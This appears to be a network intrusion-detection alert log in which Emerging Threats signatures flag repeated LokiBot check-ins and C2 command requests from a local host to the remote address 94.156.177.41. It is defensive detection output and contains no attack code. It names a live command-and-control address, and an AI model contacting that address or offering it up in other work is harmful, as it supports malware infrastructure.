2025-01-11T07:45:08.037685+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49928	94.156.177.41	80	TCP
2025-01-11T07:45:08.037685+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49928	94.156.177.41	80	TCP
2025-01-11T07:45:08.745796+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49928	94.156.177.41	80	TCP
2025-01-11T07:45:08.745796+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49928	94.156.177.41	80	TCP
2025-01-11T07:45:08.914118+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49934	94.156.177.41	80	TCP
2025-01-11T07:45:08.914118+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49934	94.156.177.41	80	TCP
2025-01-11T07:45:08.914118+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49934	94.156.177.41	80	TCP
2025-01-11T07:45:09.642873+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49934	94.156.177.41	80	TCP
2025-01-11T07:45:09.642873+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49934	94.156.177.41	80	TCP
2025-01-11T07:45:09.933380+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49939	94.156.177.41	80	TCP
2025-01-11T07:45:09.933380+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49939	94.156.177.41	80	TCP
2025-01-11T07:45:09.933380+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49939	94.156.177.41	80	TCP
2025-01-11T07:45:10.652685+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49939	94.156.177.41	80	TCP
2025-01-11T07:45:10.652685+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49939	94.156.177.41	80	TCP
2025-01-11T07:45:10.851770+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49945	94.156.177.41	80	TCP
2025-01-11T07:45:10.851770+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49945	94.156.177.41	80	TCP
2025-01-11T07:45:10.851770+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49945	94.156.177.41	80	TCP
2025-01-11T07:45:11.552968+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49945	94.156.177.41	80	TCP
2025-01-11T07:45:11.552968+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49945	94.156.177.41	80	TCP
2025-01-11T07:45:11.717555+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49953	94.156.177.41	80	TCP
2025-01-11T07:45:11.717555+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49953	94.156.177.41	80	TCP
2025-01-11T07:45:11.717555+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49953	94.156.177.41	80	TCP
2025-01-11T07:45:12.418770+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49953	94.156.177.41	80	TCP
2025-01-11T07:45:12.418770+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49953	94.156.177.41	80	TCP
2025-01-11T07:45:12.578126+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49961	94.156.177.41	80	TCP
2025-01-11T07:45:12.578126+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49961	94.156.177.41	80	TCP
2025-01-11T07:45:12.578126+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49961	94.156.177.41	80	TCP
2025-01-11T07:45:13.284283+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49961	94.156.177.41	80	TCP
2025-01-11T07:45:13.284283+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49961	94.156.177.41	80	TCP
2025-01-11T07:45:13.478552+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49968	94.156.177.41	80	TCP
2025-01-11T07:45:13.478552+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49968	94.156.177.41	80	TCP
2025-01-11T07:45:13.478552+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49968	94.156.177.41	80	TCP
2025-01-11T07:45:14.187829+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49968	94.156.177.41	80	TCP
2025-01-11T07:45:14.187829+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49968	94.156.177.41	80	TCP
2025-01-11T07:45:14.340906+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49974	94.156.177.41	80	TCP
2025-01-11T07:45:14.340906+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49974	94.156.177.41	80	TCP
2025-01-11T07:45:14.340906+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49974	94.156.177.41	80	TCP
2025-01-11T07:45:15.050986+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49974	94.156.177.41	80	TCP
2025-01-11T07:45:15.050986+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49974	94.156.177.41	80	TCP
2025-01-11T07:45:15.208568+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49980	94.156.177.41	80	TCP
2025-01-11T07:45:15.208568+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49980	94.156.177.41	80	TCP
2025-01-11T07:45:15.208568+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49980	94.156.177.41	80	TCP
2025-01-11T07:45:15.918385+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49980	94.156.177.41	80	TCP
2025-01-11T07:45:15.918385+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49980	94.156.177.41	80	TCP
2025-01-11T07:45:16.076063+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49986	94.156.177.41	80	TCP
2025-01-11T07:45:16.076063+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49986	94.156.177.41	80	TCP
2025-01-11T07:45:16.076063+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49986	94.156.177.41	80	TCP
2025-01-11T07:45:16.804729+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49986	94.156.177.41	80	TCP
2025-01-11T07:45:16.804729+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49986	94.156.177.41	80	TCP
2025-01-11T07:45:16.950781+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49993	94.156.177.41	80	TCP
2025-01-11T07:45:16.950781+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49993	94.156.177.41	80	TCP
2025-01-11T07:45:16.950781+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49993	94.156.177.41	80	TCP
2025-01-11T07:45:17.675448+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49993	94.156.177.41	80	TCP
2025-01-11T07:45:17.675448+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49993	94.156.177.41	80	TCP
2025-01-11T07:45:17.828451+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50002	94.156.177.41	80	TCP
2025-01-11T07:45:17.828451+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50002	94.156.177.41	80	TCP
2025-01-11T07:45:17.828451+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50002	94.156.177.41	80	TCP
2025-01-11T07:45:18.537448+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50002	94.156.177.41	80	TCP
2025-01-11T07:45:18.537448+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50002	94.156.177.41	80	TCP
2025-01-11T07:45:18.943087+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50010	94.156.177.41	80	TCP
2025-01-11T07:45:18.943087+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50010	94.156.177.41	80	TCP
2025-01-11T07:45:18.943087+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50010	94.156.177.41	80	TCP
2025-01-11T07:45:19.654529+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50010	94.156.177.41	80	TCP
2025-01-11T07:45:19.654529+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50010	94.156.177.41	80	TCP
2025-01-11T07:45:19.816581+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50016	94.156.177.41	80	TCP
2025-01-11T07:45:19.816581+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50016	94.156.177.41	80	TCP
2025-01-11T07:45:19.816581+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50016	94.156.177.41	80	TCP
2025-01-11T07:45:20.537471+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50016	94.156.177.41	80	TCP
2025-01-11T07:45:20.537471+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50016	94.156.177.41	80	TCP
2025-01-11T07:45:20.695534+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50022	94.156.177.41	80	TCP
2025-01-11T07:45:20.695534+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50022	94.156.177.41	80	TCP
2025-01-11T07:45:20.695534+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50022	94.156.177.41	80	TCP
2025-01-11T07:45:21.400480+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50022	94.156.177.41	80	TCP
2025-01-11T07:45:21.400480+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50022	94.156.177.41	80	TCP
2025-01-11T07:45:21.906791+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50027	94.156.177.41	80	TCP
2025-01-11T07:45:21.906791+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50027	94.156.177.41	80	TCP
2025-01-11T07:45:21.906791+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50027	94.156.177.41	80	TCP
2025-01-11T07:45:22.637453+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50027	94.156.177.41	80	TCP
2025-01-11T07:45:22.637453+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50027	94.156.177.41	80	TCP
2025-01-11T07:45:22.801196+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50037	94.156.177.41	80	TCP
2025-01-11T07:45:22.801196+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50037	94.156.177.41	80	TCP
2025-01-11T07:45:22.801196+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50037	94.156.177.41	80	TCP
2025-01-11T07:45:23.500259+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50037	94.156.177.41	80	TCP
2025-01-11T07:45:23.500259+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50037	94.156.177.41	80	TCP
2025-01-11T07:45:23.654933+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50043	94.156.177.41	80	TCP
2025-01-11T07:45:23.654933+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50043	94.156.177.41	80	TCP
2025-01-11T07:45:23.654933+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50043	94.156.177.41	80	TCP
2025-01-11T07:45:24.391600+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50043	94.156.177.41	80	TCP
2025-01-11T07:45:24.391600+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50043	94.156.177.41	80	TCP
2025-01-11T07:45:24.666068+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50044	94.156.177.41	80	TCP
2025-01-11T07:45:24.666068+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50044	94.156.177.41	80	TCP
2025-01-11T07:45:24.666068+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50044	94.156.177.41	80	TCP
2025-01-11T07:45:25.387120+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50044	94.156.177.41	80	TCP
2025-01-11T07:45:25.387120+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50044	94.156.177.41	80	TCP
2025-01-11T07:45:25.549065+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50045	94.156.177.41	80	TCP
2025-01-11T07:45:25.549065+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50045	94.156.177.41	80	TCP
2025-01-11T07:45:25.549065+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50045	94.156.177.41	80	TCP
2025-01-11T07:45:26.266552+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50045	94.156.177.41	80	TCP
2025-01-11T07:45:26.266552+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50045	94.156.177.41	80	TCP
2025-01-11T07:45:26.431338+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50046	94.156.177.41	80	TCP
2025-01-11T07:45:26.431338+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50046	94.156.177.41	80	TCP
2025-01-11T07:45:26.431338+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50046	94.156.177.41	80	TCP
2025-01-11T07:45:27.122844+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50046	94.156.177.41	80	TCP
2025-01-11T07:45:27.122844+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50046	94.156.177.41	80	TCP
2025-01-11T07:45:27.499770+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50047	94.156.177.41	80	TCP
2025-01-11T07:45:27.499770+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50047	94.156.177.41	80	TCP
2025-01-11T07:45:27.499770+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50047	94.156.177.41	80	TCP
2025-01-11T07:45:28.215382+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50047	94.156.177.41	80	TCP
2025-01-11T07:45:28.215382+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50047	94.156.177.41	80	TCP
2025-01-11T07:45:28.375675+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50048	94.156.177.41	80	TCP
2025-01-11T07:45:28.375675+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50048	94.156.177.41	80	TCP
2025-01-11T07:45:28.375675+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50048	94.156.177.41	80	TCP
2025-01-11T07:45:29.109982+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50048	94.156.177.41	80	TCP
2025-01-11T07:45:29.109982+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50048	94.156.177.41	80	TCP
2025-01-11T07:45:29.280517+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50049	94.156.177.41	80	TCP
2025-01-11T07:45:29.280517+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50049	94.156.177.41	80	TCP
2025-01-11T07:45:29.280517+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50049	94.156.177.41	80	TCP
2025-01-11T07:45:29.977511+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50049	94.156.177.41	80	TCP
2025-01-11T07:45:29.977511+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50049	94.156.177.41	80	TCP
2025-01-11T07:45:30.122846+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50050	94.156.177.41	80	TCP
2025-01-11T07:45:30.122846+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50050	94.156.177.41	80	TCP
2025-01-11T07:45:30.122846+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50050	94.156.177.41	80	TCP
2025-01-11T07:45:30.838290+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50050	94.156.177.41	80	TCP
2025-01-11T07:45:30.838290+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50050	94.156.177.41	80	TCP
2025-01-11T07:45:30.991478+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50051	94.156.177.41	80	TCP
2025-01-11T07:45:30.991478+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50051	94.156.177.41	80	TCP
2025-01-11T07:45:30.991478+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50051	94.156.177.41	80	TCP
2025-01-11T07:45:31.709287+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50051	94.156.177.41	80	TCP
2025-01-11T07:45:31.709287+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50051	94.156.177.41	80	TCP
2025-01-11T07:45:31.859651+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50052	94.156.177.41	80	TCP
2025-01-11T07:45:31.859651+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50052	94.156.177.41	80	TCP
2025-01-11T07:45:31.859651+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50052	94.156.177.41	80	TCP
2025-01-11T07:45:32.579246+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50052	94.156.177.41	80	TCP
2025-01-11T07:45:32.579246+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50052	94.156.177.41	80	TCP
2025-01-11T07:45:32.741029+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50053	94.156.177.41	80	TCP
2025-01-11T07:45:32.741029+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50053	94.156.177.41	80	TCP
2025-01-11T07:45:32.741029+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50053	94.156.177.41	80	TCP
2025-01-11T07:45:33.462401+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50053	94.156.177.41	80	TCP
2025-01-11T07:45:33.462401+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50053	94.156.177.41	80	TCP
2025-01-11T07:45:33.607086+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50054	94.156.177.41	80	TCP
2025-01-11T07:45:33.607086+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50054	94.156.177.41	80	TCP
2025-01-11T07:45:33.607086+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50054	94.156.177.41	80	TCP
2025-01-11T07:45:34.323221+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50054	94.156.177.41	80	TCP
2025-01-11T07:45:34.323221+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50054	94.156.177.41	80	TCP
2025-01-11T07:45:34.487775+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50055	94.156.177.41	80	TCP
2025-01-11T07:45:34.487775+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50055	94.156.177.41	80	TCP
2025-01-11T07:45:34.487775+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50055	94.156.177.41	80	TCP
2025-01-11T07:45:35.186639+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50055	94.156.177.41	80	TCP
2025-01-11T07:45:35.186639+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50055	94.156.177.41	80	TCP
2025-01-11T07:45:35.345550+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50056	94.156.177.41	80	TCP
2025-01-11T07:45:35.345550+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50056	94.156.177.41	80	TCP
2025-01-11T07:45:35.345550+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50056	94.156.177.41	80	TCP
2025-01-11T07:45:36.073409+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50056	94.156.177.41	80	TCP
2025-01-11T07:45:36.073409+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50056	94.156.177.41	80	TCP
2025-01-11T07:45:36.525051+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50057	94.156.177.41	80	TCP
2025-01-11T07:45:36.525051+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50057	94.156.177.41	80	TCP
2025-01-11T07:45:36.525051+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50057	94.156.177.41	80	TCP
2025-01-11T07:45:37.239895+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50057	94.156.177.41	80	TCP
2025-01-11T07:45:37.239895+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50057	94.156.177.41	80	TCP
2025-01-11T07:45:37.400062+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50058	94.156.177.41	80	TCP
2025-01-11T07:45:37.400062+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50058	94.156.177.41	80	TCP
2025-01-11T07:45:37.400062+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50058	94.156.177.41	80	TCP
2025-01-11T07:45:38.251440+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50058	94.156.177.41	80	TCP
2025-01-11T07:45:38.251440+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50058	94.156.177.41	80	TCP
2025-01-11T07:45:38.410807+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50059	94.156.177.41	80	TCP
2025-01-11T07:45:38.410807+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50059	94.156.177.41	80	TCP
2025-01-11T07:45:38.410807+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50059	94.156.177.41	80	TCP
2025-01-11T07:45:39.138394+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50059	94.156.177.41	80	TCP
2025-01-11T07:45:39.138394+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50059	94.156.177.41	80	TCP
2025-01-11T07:45:39.302388+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50060	94.156.177.41	80	TCP
2025-01-11T07:45:39.302388+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50060	94.156.177.41	80	TCP
2025-01-11T07:45:39.302388+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50060	94.156.177.41	80	TCP
2025-01-11T07:45:40.007540+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50060	94.156.177.41	80	TCP
2025-01-11T07:45:40.007540+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50060	94.156.177.41	80	TCP
2025-01-11T07:45:40.165796+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50061	94.156.177.41	80	TCP
2025-01-11T07:45:40.165796+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50061	94.156.177.41	80	TCP
2025-01-11T07:45:40.165796+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50061	94.156.177.41	80	TCP
2025-01-11T07:45:40.857097+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50061	94.156.177.41	80	TCP
2025-01-11T07:45:40.857097+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50061	94.156.177.41	80	TCP
2025-01-11T07:45:41.015055+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50062	94.156.177.41	80	TCP
2025-01-11T07:45:41.015055+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50062	94.156.177.41	80	TCP
2025-01-11T07:45:41.015055+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50062	94.156.177.41	80	TCP
2025-01-11T07:45:41.732826+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50062	94.156.177.41	80	TCP
2025-01-11T07:45:41.732826+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50062	94.156.177.41	80	TCP
2025-01-11T07:45:42.032602+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50063	94.156.177.41	80	TCP
2025-01-11T07:45:42.032602+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50063	94.156.177.41	80	TCP
2025-01-11T07:45:42.032602+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50063	94.156.177.41	80	TCP
2025-01-11T07:45:42.753857+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50063	94.156.177.41	80	TCP
2025-01-11T07:45:42.753857+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50063	94.156.177.41	80	TCP
2025-01-11T07:45:42.904942+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50064	94.156.177.41	80	TCP
2025-01-11T07:45:42.904942+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50064	94.156.177.41	80	TCP
2025-01-11T07:45:42.904942+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50064	94.156.177.41	80	TCP
2025-01-11T07:45:43.607936+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50064	94.156.177.41	80	TCP
2025-01-11T07:45:43.607936+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50064	94.156.177.41	80	TCP
2025-01-11T07:45:43.761690+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50065	94.156.177.41	80	TCP
2025-01-11T07:45:43.761690+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50065	94.156.177.41	80	TCP
2025-01-11T07:45:43.761690+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50065	94.156.177.41	80	TCP
2025-01-11T07:45:44.450980+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50065	94.156.177.41	80	TCP
2025-01-11T07:45:44.450980+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50065	94.156.177.41	80	TCP
2025-01-11T07:45:44.721124+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50066	94.156.177.41	80	TCP
2025-01-11T07:45:44.721124+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50066	94.156.177.41	80	TCP
2025-01-11T07:45:44.721124+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50066	94.156.177.41	80	TCP
